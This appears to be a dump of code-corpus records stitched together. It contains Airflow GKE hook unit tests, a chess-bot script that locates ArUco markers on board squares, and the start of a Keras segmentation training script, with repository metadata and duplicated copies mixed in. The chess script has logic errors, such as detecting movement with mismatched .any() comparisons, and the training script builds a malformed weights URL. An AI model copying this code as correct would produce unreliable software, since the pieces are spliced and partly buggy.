@mock.patch('airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook._get_credentials')
def test_get_client(self, mock_get_credentials, mock_client_info, mock_client):
self.gke_hook._client = None
self.gke_hook.get_conn()
assert mock_get_credentials.called
mock_client.assert_called_once_with(
credentials=mock_get_credentials.return_value,
client_info=mock_client_info.return_value)
def test_get_operation(self):
self.gke_hook._client.get_operation = mock.Mock()
self.gke_hook.get_operation('TEST_OP', project_id=TEST_GCP_PROJECT_ID)
self.gke_hook._client.get_operation.assert_called_once_with(
project_id=TEST_GCP_PROJECT_ID, zone=GKE_ZONE, operation_id='TEST_OP')
def test_append_label(self):
key = 'test-key'
val = 'test-val'
mock_proto = mock.Mock()
self.gke_hook._append_label(mock_proto, key, val)
mock_proto.resource_labels.update.assert_called_once_with({key: val})
def test_append_label_replace(self):
key = 'test-key'
val = 'test.val+this'
mock_proto = mock.Mock()
self.gke_hook._append_label(mock_proto, key, val)
mock_proto.resource_labels.update.assert_called_once_with({key: 'test-val-this'})
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.time.sleep")
def test_wait_for_response_done(self, time_mock):
from google.cloud.container_v1.gapic.enums import Operation
mock_op = mock.Mock()
mock_op.status = Operation.Status.DONE
self.gke_hook.wait_for_operation(mock_op)
self.assertEqual(time_mock.call_count, 1)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.time.sleep")
def test_wait_for_response_exception(self, time_mock):
from google.cloud.container_v1.gapic.enums import Operation
from google.cloud.exceptions import GoogleCloudError
mock_op = mock.Mock()
mock_op.status = Operation.Status.ABORTING
with self.assertRaises(GoogleCloudError):
self.gke_hook.wait_for_operation(mock_op)
self.assertEqual(time_mock.call_count, 1)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.get_operation")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.time.sleep")
def test_wait_for_response_running(self, time_mock, operation_mock):
from google.cloud.container_v1.gapic.enums import Operation
running_op, done_op, pending_op = mock.Mock(), mock.Mock(), mock.Mock()
running_op.status = Operation.Status.RUNNING
done_op.status = Operation.Status.DONE
pending_op.status = Operation.Status.PENDING
# Status goes from Running -> Pending -> Done
operation_mock.side_effect = [pending_op, done_op]
self.gke_hook.wait_for_operation(running_op, project_id=TEST_GCP_PROJECT_ID)
self.assertEqual(time_mock.call_count, 3)
operation_mock.assert_any_call(running_op.name, project_id=TEST_GCP_PROJECT_ID)
operation_mock.assert_any_call(pending_op.name, project_id=TEST_GCP_PROJECT_ID)
self.assertEqual(operation_mock.call_count, 2)
| 44.359621
| 107
| 0.685535
|
import unittest
import mock
from google.cloud.container_v1.types import Cluster
from mock import PropertyMock
from airflow import AirflowException
from airflow.providers.google.cloud.hooks.kubernetes_engine import GKEHook
TASK_ID = 'test-gke-cluster-operator'
CLUSTER_NAME = 'test-cluster'
TEST_GCP_PROJECT_ID = 'test-project'
GKE_ZONE = 'test-zone'
class TestGKEHookClient(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.client_info",
new_callable=mock.PropertyMock
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook._get_credentials")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.container_v1.ClusterManagerClient")
def test_gke_cluster_client_creation(self, mock_client, mock_get_creds, mock_client_info):
result = self.gke_hook.get_conn()
mock_client.assert_called_once_with(
credentials=mock_get_creds.return_value,
client_info=mock_client_info.return_value
)
self.assertEqual(mock_client.return_value, result)
self.assertEqual(self.gke_hook._client, result)
class TestGKEHookDelete(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_delete_cluster(self, wait_mock, convert_mock, mock_project_id):
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_delete = self.gke_hook._client.delete_cluster = mock.Mock()
self.gke_hook.delete_cluster(name=CLUSTER_NAME, project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_delete.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster_id=CLUSTER_NAME,
retry=retry_mock,
timeout=timeout_mock)
wait_mock.assert_called_once_with(client_delete.return_value)
convert_mock.assert_not_called()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.log")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_delete_cluster_not_found(self, wait_mock, convert_mock, log_mock, mock_project_id):
from google.api_core.exceptions import NotFound
message = 'Not Found'
self.gke_hook._client.delete_cluster.side_effect = NotFound(message=message)
self.gke_hook.delete_cluster(name='not-existing', project_id=TEST_GCP_PROJECT_ID)
wait_mock.assert_not_called()
convert_mock.assert_not_called()
log_mock.info.assert_any_call("Assuming Success: %s", message)
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_delete_cluster_error(self, wait_mock, convert_mock, mock_project_id):
self.gke_hook._client.delete_cluster.side_effect = AirflowException('400')
with self.assertRaises(AirflowException):
self.gke_hook.delete_cluster(name='a-cluster')
wait_mock.assert_not_called()
convert_mock.assert_not_called()
class TestGKEHookCreate(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_proto(self, wait_mock, convert_mock, mock_project_id):
mock_cluster_proto = Cluster()
mock_cluster_proto.name = CLUSTER_NAME
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_create = self.gke_hook._client.create_cluster = mock.Mock()
self.gke_hook.create_cluster(cluster=mock_cluster_proto,
project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_create.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster=mock_cluster_proto,
retry=retry_mock, timeout=timeout_mock)
wait_mock.assert_called_once_with(client_create.return_value)
convert_mock.assert_not_called()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_dict(self, wait_mock, convert_mock, mock_project_id):
mock_cluster_dict = {'name': CLUSTER_NAME}
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_create = self.gke_hook._client.create_cluster = mock.Mock()
proto_mock = convert_mock.return_value = mock.Mock()
self.gke_hook.create_cluster(cluster=mock_cluster_dict,
project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_create.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster=proto_mock,
retry=retry_mock, timeout=timeout_mock)
wait_mock.assert_called_once_with(client_create.return_value)
convert_mock.assert_called_once_with(
{'name': 'test-cluster'},
Cluster()
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_error(self, wait_mock, convert_mock):
mock_cluster_proto = None
with self.assertRaises(AirflowException):
self.gke_hook.create_cluster(mock_cluster_proto)
wait_mock.assert_not_called()
convert_mock.assert_not_called()
@mock.patch(
'airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook._get_credentials_and_project_id',
return_value=(mock.MagicMock(), TEST_GCP_PROJECT_ID)
)
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.log")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_already_exists(self, wait_mock, convert_mock, log_mock, mock_get_credentials):
from google.api_core.exceptions import AlreadyExists
message = 'Already Exists'
self.gke_hook._client.create_cluster.side_effect = AlreadyExists(message=message)
self.gke_hook.create_cluster(cluster={}, project_id=TEST_GCP_PROJECT_ID)
wait_mock.assert_not_called()
self.assertEqual(convert_mock.call_count, 1)
log_mock.info.assert_any_call("Assuming Success: %s", message)
class TestGKEHookGet(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
def test_get_cluster(self):
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_get = self.gke_hook._client.get_cluster = mock.Mock()
self.gke_hook.get_cluster(name=CLUSTER_NAME,
project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_get.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster_id=CLUSTER_NAME,
retry=retry_mock, timeout=timeout_mock)
class TestGKEHook(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
@mock.patch('airflow.providers.google.cloud.hooks.kubernetes_engine.container_v1.'
'ClusterManagerClient')
@mock.patch('airflow.providers.google.cloud.hooks.base.ClientInfo')
@mock.patch('airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook._get_credentials')
def test_get_client(self, mock_get_credentials, mock_client_info, mock_client):
self.gke_hook._client = None
self.gke_hook.get_conn()
assert mock_get_credentials.called
mock_client.assert_called_once_with(
credentials=mock_get_credentials.return_value,
client_info=mock_client_info.return_value)
def test_get_operation(self):
self.gke_hook._client.get_operation = mock.Mock()
self.gke_hook.get_operation('TEST_OP', project_id=TEST_GCP_PROJECT_ID)
self.gke_hook._client.get_operation.assert_called_once_with(
project_id=TEST_GCP_PROJECT_ID, zone=GKE_ZONE, operation_id='TEST_OP')
def test_append_label(self):
key = 'test-key'
val = 'test-val'
mock_proto = mock.Mock()
self.gke_hook._append_label(mock_proto, key, val)
mock_proto.resource_labels.update.assert_called_once_with({key: val})
def test_append_label_replace(self):
key = 'test-key'
val = 'test.val+this'
mock_proto = mock.Mock()
self.gke_hook._append_label(mock_proto, key, val)
mock_proto.resource_labels.update.assert_called_once_with({key: 'test-val-this'})
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.time.sleep")
def test_wait_for_response_done(self, time_mock):
from google.cloud.container_v1.gapic.enums import Operation
mock_op = mock.Mock()
mock_op.status = Operation.Status.DONE
self.gke_hook.wait_for_operation(mock_op)
self.assertEqual(time_mock.call_count, 1)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.time.sleep")
def test_wait_for_response_exception(self, time_mock):
from google.cloud.container_v1.gapic.enums import Operation
from google.cloud.exceptions import GoogleCloudError
mock_op = mock.Mock()
mock_op.status = Operation.Status.ABORTING
with self.assertRaises(GoogleCloudError):
self.gke_hook.wait_for_operation(mock_op)
self.assertEqual(time_mock.call_count, 1)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.get_operation")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.time.sleep")
def test_wait_for_response_running(self, time_mock, operation_mock):
from google.cloud.container_v1.gapic.enums import Operation
running_op, done_op, pending_op = mock.Mock(), mock.Mock(), mock.Mock()
running_op.status = Operation.Status.RUNNING
done_op.status = Operation.Status.DONE
pending_op.status = Operation.Status.PENDING
operation_mock.side_effect = [pending_op, done_op]
self.gke_hook.wait_for_operation(running_op, project_id=TEST_GCP_PROJECT_ID)
self.assertEqual(time_mock.call_count, 3)
operation_mock.assert_any_call(running_op.name, project_id=TEST_GCP_PROJECT_ID)
operation_mock.assert_any_call(pending_op.name, project_id=TEST_GCP_PROJECT_ID)
self.assertEqual(operation_mock.call_count, 2)
| true
| true
|
1c3e850e69120700b53c04cd15ff2bb0f49eba20
| 9,662
|
py
|
Python
|
templateMatching.py
|
AndrewMDelgado/UTA_ChessBot
|
e57218526102a95db8e9b4892c1c1b63b1322c98
|
[
"MIT"
] | null | null | null |
templateMatching.py
|
AndrewMDelgado/UTA_ChessBot
|
e57218526102a95db8e9b4892c1c1b63b1322c98
|
[
"MIT"
] | null | null | null |
templateMatching.py
|
AndrewMDelgado/UTA_ChessBot
|
e57218526102a95db8e9b4892c1c1b63b1322c98
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Apr 7 14:48:33 2018
@author: lenangungu
"""
import numpy as np
import time
from aruco_detect import detectCode
from aruco_detect import detectCode2
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import skimage.feature as sk
class Match:
def __init__(self):
self.board = self.createBoard()
def position(self, corners):
print (corners)
x = min(corners[0][0],corners[1][0],corners[2][0],corners[3][0])
y = min(corners[0][1],corners[2][1],corners[1][1],corners[3][1])
center = [int(x), int(y)]
#this is for each id in corners (reference from aruco_detect)
for i in range (0,8):
row = self.board[i] # e.g A
for j in range (0,8):
square1 = row[j] # e.g A1
#using center of aruco instead of top left and bottom right coordinate
print(center[0],square1[0][0], square1[1][0])
print(center[1], square1[0][1], square1[1][1])
if ((center[0] > square1[0][0]) and (center[0] < square1[1][0])):
if((center[1] > square1[0][1]) and (center[1] < square1[1][1])):
currentSquare = square1[2]
return currentSquare
def createBoard(self):
colMax = 41 #change depending on picture
rowMax = 338
#print("(",rowMax,"," ,colMax,")")
topL = [colMax,rowMax]
botR = [121,415]
topLi = topL
botRi = botR
board = []
#WILL TURN THIS PROCESS OF MAKING THE ROWN IN A FUNCTION LATE
#Creating row A
#A = [[(topL,botR,'A1')]]
A = [[topL,botR,'A1']]
for i in range (2,9):
#xtopL = [i*topL[0],topL[1]]
xtopL = [botRi[0],topLi[1]]
#xbotR = [(i+1)*topL[0],botR[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
A.append((xtopL,xbotR,('A'+ str(i))))
topLi = xtopL
botRi = xbotR
#Creating row B
topL2 = [topL[0],topL[1] + (botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + (botR[1]-topL[1])]
topLi = topL2
botRi = botR2
board.append(A)
B = [[topL2,botR2,'B1']]
for i in range (2,9):
#xtopL = [i*topL2[0],topL2[1]]
#xbotR = [(i+1)*topL2[0],botR2[1]]
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
B.append((xtopL,xbotR,('B'+ str(i))))
board.append(B)
#Creating row C
topL2 = [topL[0],topL[1] + 2*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 2*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
C = [[topL2,botR2,'C1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
C.append((xtopL,xbotR,('C'+ str(i))))
board.append(C)
#Creating row D
topL2 = [topL[0],topL[1] + 3*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 3*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
D = [[topL2,botR2,'D1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
D.append((xtopL,xbotR,('D'+ str(i))))
board.append(D)
#Creating row E
topL2 = [topL[0],topL[1] + 4*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 4*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
E = [[topL2,botR2,'E1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
E.append((xtopL,xbotR,('E'+ str(i))))
board.append(E)
#Creating row F
topL2 = [topL[0],topL[1] + 5*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 5*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
F = [[topL2,botR2,'F1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
F.append((xtopL,xbotR,('F'+ str(i))))
board.append(F)
#Creating row G
topL2 = [topL[0],topL[1] + 6*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 6*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
G = [[topL2,botR2,'G1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
G.append((xtopL,xbotR,('G'+ str(i))))
board.append(G)
#Creating row H
topL2 = [topL[0],topL[1] + 7*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 7*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
H = [[topL2,botR2,'H1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
H.append((xtopL,xbotR,('H'+ str(i))))
board.append(H)
return board
'''
#This is to make sure the board is stored correctly
for i in range (H[7][0][1], H[7][1][1]):
for u in range (H[7][0][0],(H[7][1][0])):
img_copy[i][u] = 0
plt.figure(3)
fullImgGray = rgb2gray(img_copy)
plt.imshow(fullImgGray, cmap = plt.get_cmap('gray'))
'''
'''
#TO OPTIMIZE, USE CENTER OF ARUCO AND SQUARE ON BOARD
#Algorithm to see what square aruco code falls in
#Aruco returns four corners of the ID
'''
def genDiffs(self): #function that runs templateMatching
#call aruco detect to get ids and corresponding corners
currentSquare = ''
square_ids = []
#Have aruco detect make a 2D array of id,corners
#Call aruco_detect and return ids with corresponding coordinates and save as previous state
changes = []
ids1, previousState = detectCode()
#after a user move, call aruco_detect and save as current state
ids2, currentState = detectCode2()
idsPrev = ids1
idsCurr = ids2
ids1 = ids1.astype(int)
ids1 = ids1.ravel()
ids1.sort()
ids2 = ids2.astype(int)
ids2 = ids2.ravel()
ids2.sort()
#print("ids1: ",ids1)
#print("uds2: ",ids2)
#Run algorithm to detect move
if (len(previousState) == len(currentState)):
#find which id changed coordinates
for i in range(0, len(previousState)):
#if pieces move slightly, that will also be considered as a change in coordinate so if we have more than one change we need to look more into it
if (previousState[i][0]).any() != (currentState[i][0]).any(): #Assuming the ids are ordered, if not then order them using a function
pos1 = self.position(previousState[i][0])#call function that computes squares - takes corners of ID
pos2 = self.position(currentState[i][0])
changes.append((idsPrev[i],pos1,pos2))
else:
pass
#Use changes array to classify the new position of pieces (create a classify function that returns ids and squares they are in)
else:
#print(len(previousState),len(currentState))
for i in range (0,len(ids1)):
currentID = ids1[i]
j = 0
f = 0
for j in range (0,len(ids2)):
if currentID == ids2[j]:
f = 1
#still check if coordinates changed
if (previousState[np.where(idsPrev == (currentID))[0]][0]).any() != (currentState[np.where(idsCurr == (currentID))[0]][0]).any():
#compute square change
pos1 = self.position(previousState[np.where(idsPrev == (currentID))[0]][0])#call function that computes squares - takes corners of ID
pos2 = self.position(currentState[np.where(idsCurr == (currentID))[0]][0])
changes.append((currentID,pos1,pos2))
#print(current,ids2[j])
else:
j += 1
if f == 0:
#get coordinates from corners of previous state
#classify square and have (id,from,null) - meaning piece was removed
print(currentID)
pos1 = self.position(previousState[np.where(idsPrev == (currentID))[0]][0])
pos2 = '_'
changes.append((currentID,pos1,pos2))
print(changes)
#print to a file
| 31.472313
| 161
| 0.477541
|
import numpy as np
import time
from aruco_detect import detectCode
from aruco_detect import detectCode2
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import skimage.feature as sk
class Match:
def __init__(self):
self.board = self.createBoard()
def position(self, corners):
print (corners)
x = min(corners[0][0],corners[1][0],corners[2][0],corners[3][0])
y = min(corners[0][1],corners[2][1],corners[1][1],corners[3][1])
center = [int(x), int(y)]
for i in range (0,8):
row = self.board[i]
for j in range (0,8):
square1 = row[j]
print(center[0],square1[0][0], square1[1][0])
print(center[1], square1[0][1], square1[1][1])
if ((center[0] > square1[0][0]) and (center[0] < square1[1][0])):
if((center[1] > square1[0][1]) and (center[1] < square1[1][1])):
currentSquare = square1[2]
return currentSquare
def createBoard(self):
colMax = 41
rowMax = 338
topL = [colMax,rowMax]
botR = [121,415]
topLi = topL
botRi = botR
board = []
A = [[topL,botR,'A1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
A.append((xtopL,xbotR,('A'+ str(i))))
topLi = xtopL
botRi = xbotR
topL2 = [topL[0],topL[1] + (botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + (botR[1]-topL[1])]
topLi = topL2
botRi = botR2
board.append(A)
B = [[topL2,botR2,'B1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
B.append((xtopL,xbotR,('B'+ str(i))))
board.append(B)
topL2 = [topL[0],topL[1] + 2*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 2*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
C = [[topL2,botR2,'C1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
C.append((xtopL,xbotR,('C'+ str(i))))
board.append(C)
topL2 = [topL[0],topL[1] + 3*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 3*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
D = [[topL2,botR2,'D1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
D.append((xtopL,xbotR,('D'+ str(i))))
board.append(D)
topL2 = [topL[0],topL[1] + 4*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 4*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
E = [[topL2,botR2,'E1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
E.append((xtopL,xbotR,('E'+ str(i))))
board.append(E)
topL2 = [topL[0],topL[1] + 5*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 5*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
F = [[topL2,botR2,'F1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
F.append((xtopL,xbotR,('F'+ str(i))))
board.append(F)
topL2 = [topL[0],topL[1] + 6*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 6*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
G = [[topL2,botR2,'G1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
G.append((xtopL,xbotR,('G'+ str(i))))
board.append(G)
topL2 = [topL[0],topL[1] + 7*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 7*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
H = [[topL2,botR2,'H1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
H.append((xtopL,xbotR,('H'+ str(i))))
board.append(H)
return board
def genDiffs(self):
currentSquare = ''
square_ids = []
changes = []
ids1, previousState = detectCode()
ids2, currentState = detectCode2()
idsPrev = ids1
idsCurr = ids2
ids1 = ids1.astype(int)
ids1 = ids1.ravel()
ids1.sort()
ids2 = ids2.astype(int)
ids2 = ids2.ravel()
ids2.sort()
if (len(previousState) == len(currentState)):
for i in range(0, len(previousState)):
if (previousState[i][0]).any() != (currentState[i][0]).any():
pos1 = self.position(previousState[i][0])
pos2 = self.position(currentState[i][0])
changes.append((idsPrev[i],pos1,pos2))
else:
pass
else:
for i in range (0,len(ids1)):
currentID = ids1[i]
j = 0
f = 0
for j in range (0,len(ids2)):
if currentID == ids2[j]:
f = 1
if (previousState[np.where(idsPrev == (currentID))[0]][0]).any() != (currentState[np.where(idsCurr == (currentID))[0]][0]).any():
pos1 = self.position(previousState[np.where(idsPrev == (currentID))[0]][0])
pos2 = self.position(currentState[np.where(idsCurr == (currentID))[0]][0])
changes.append((currentID,pos1,pos2))
else:
j += 1
if f == 0:
print(currentID)
pos1 = self.position(previousState[np.where(idsPrev == (currentID))[0]][0])
pos2 = '_'
changes.append((currentID,pos1,pos2))
print(changes)
| true
| true
|
1c3e8580a517f6f1347979a29bbe093e7db77cb0
| 3,627
|
py
|
Python
|
train.py
|
ChmarsLuo/Charms-Semantic-Segmentation-Models
|
4a8cdf82a218c3d3e1c8d10ef6a9118c8e6f3f89
|
[
"Apache-2.0"
] | 5
|
2021-03-09T22:56:03.000Z
|
2021-06-18T12:20:34.000Z
|
train.py
|
ChmarsLuo/Charms-Semantic-Segmentation-Models
|
4a8cdf82a218c3d3e1c8d10ef6a9118c8e6f3f89
|
[
"Apache-2.0"
] | null | null | null |
train.py
|
ChmarsLuo/Charms-Semantic-Segmentation-Models
|
4a8cdf82a218c3d3e1c8d10ef6a9118c8e6f3f89
|
[
"Apache-2.0"
] | 1
|
2021-01-23T08:32:46.000Z
|
2021-01-23T08:32:46.000Z
|
from data import *
from keras.models import load_model
import os
import keras
from keras.optimizers import *
from lr.lr import scheduler
from keras.losses import binary_crossentropy, categorical_crossentropy
from models import MobileNext
from keras.callbacks import ModelCheckpoint, TensorBoard,\
LearningRateScheduler, EarlyStopping, ReduceLROnPlateau, CSVLogger
########################################################################################################################
if __name__ == '__main__':
batch_size = 1
epochs = 30
# prepare model
model = MobileNext()
model.summary()
# load weights
BASE_WEIGHT_PATH = ('https://github.com/fchollet/deep-learning-models/'
'releases/download/v0.6/')
model_name = 'mobilenet_%s_%d_tf_no_top.h5' % ('1_0', 224)
weight_path = BASE_WEIGHT_PATH +'\\'+ model_name
weights_path = keras.utils.get_file(model_name, weight_path)
model.load_weights(weights_path, by_name=True, skip_mismatch=True)
# train and val path
train_im_path,train_mask_path = './data/build/train/images/','./data/build/train/labels/'
val_im_path,val_mask_path = './data/build/val/images/','./data/build/val/labels/'
train_set = os.listdir(train_im_path)
val_set = os.listdir(val_im_path)
train_number = len(train_set)
val_number = len(val_set)
train_root = './data/build/train/'
val_root = './data/build/val/'
# data aug and generator
data_gen_args = dict(rotation_range=0.2,
width_shift_range=0.05,
height_shift_range=0.05,
shear_range=0.05,
zoom_range=0.05,
horizontal_flip=True,
fill_mode='nearest')
training_generator = trainGenerator(batch_size,train_root,'images','labels',data_gen_args,
image_save_data_dir = None,
mask_save_data_dir = None
)
validation_generator = trainGenerator(batch_size,val_root,'images','labels',data_gen_args,
image_save_data_dir=None,
mask_save_data_dir=None,
)
model_path ="./logs/"
model_name = 'build_{epoch:03d}.h5'
model_file = os.path.join(model_path, model_name)
model_checkpoint = ModelCheckpoint(model_file, monitor='val_loss', verbose=1, save_best_only=True, mode='auto')
lr_reducer = ReduceLROnPlateau(monitor='val_loss', factor=np.sqrt(0.5625), cooldown=0, patience=5, min_lr=0.5e-6)
model.compile(loss=binary_crossentropy,
optimizer=Adam(lr=1e-3),
metrics=['accuracy'])
callable = [EarlyStopping(monitor='val_loss', patience=10, verbose=1, mode='auto'),
model_checkpoint,
lr_reducer,
CSVLogger(filename='./logs/log.csv', append=False), # CSVLoggerb保存训练结果 好好用
TensorBoard(log_dir='./logs/')]
model.fit_generator(generator=training_generator,
validation_data=validation_generator,
steps_per_epoch=train_number//batch_size,
validation_steps=val_number//batch_size,
use_multiprocessing=False,
epochs=epochs,verbose=1,
initial_epoch = 0,
callbacks=callable)
| 44.231707
| 121
| 0.570168
|
from data import *
from keras.models import load_model
import os
import keras
from keras.optimizers import *
from lr.lr import scheduler
from keras.losses import binary_crossentropy, categorical_crossentropy
from models import MobileNext
from keras.callbacks import ModelCheckpoint, TensorBoard,\
LearningRateScheduler, EarlyStopping, ReduceLROnPlateau, CSVLogger
| true
| true
|
1c3e86182db408ba7ef54aa9b065e364e0d389b0
| 660
|
py
|
Python
|
gencove/command/s3_imports/autoimports/autoimport_list/cli.py
|
gncv/gencove-cli
|
b4bcbe5b6a1506544472542af8b2384d21c7cbe4
|
[
"Apache-2.0"
] | 1
|
